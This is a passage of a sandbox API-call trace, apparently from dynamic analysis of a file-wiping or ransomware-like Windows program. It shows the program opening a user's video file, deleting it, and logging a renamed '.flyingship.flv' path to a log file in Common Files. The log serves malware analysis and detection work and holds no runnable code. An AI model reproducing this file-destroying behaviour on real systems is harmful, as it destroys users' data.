wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.133] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.133] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0197.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0197.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0x90ae18 [0197.134] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.134] CharLowerBuffW (in: lpsz="byte[47460]", cchLength=0xb | out: lpsz="byte[47460]") returned 0xb [0197.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.134] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.134] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.135] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.135] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.135] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0197.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.136] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.137] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.137] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\0vlshoaoyv07rlgs7cfh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.137] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.137] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.137] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.138] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.138] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.138] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.138] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.139] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.139] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFilePart=0x0) returned 0x5f [0197.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1a69a520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0x90ae18 [0197.139] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\0vlshoaoyv07rlgs7cfh.flv")) returned 1 [0197.141] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1a69a520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0 [0197.141] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.144] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.144] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.144] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.144] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.144] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0197.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.145] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.145] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0197.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.145] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.145] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.145] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.145] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.145] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.146] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.146] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3901, lpOverlapped=0x0) returned 1 [0197.146] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.146] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3901, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.147] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\n", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0197.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6d) returned 0x906f38 [0197.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\n", cchWideChar=109, lpMultiByteStr=0x906f38, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 109 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0197.147] WriteFile (in: hFile=0x160, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6c, lpOverlapped=0x0) returned 1 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.147] CloseHandle (hObject=0x160) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: 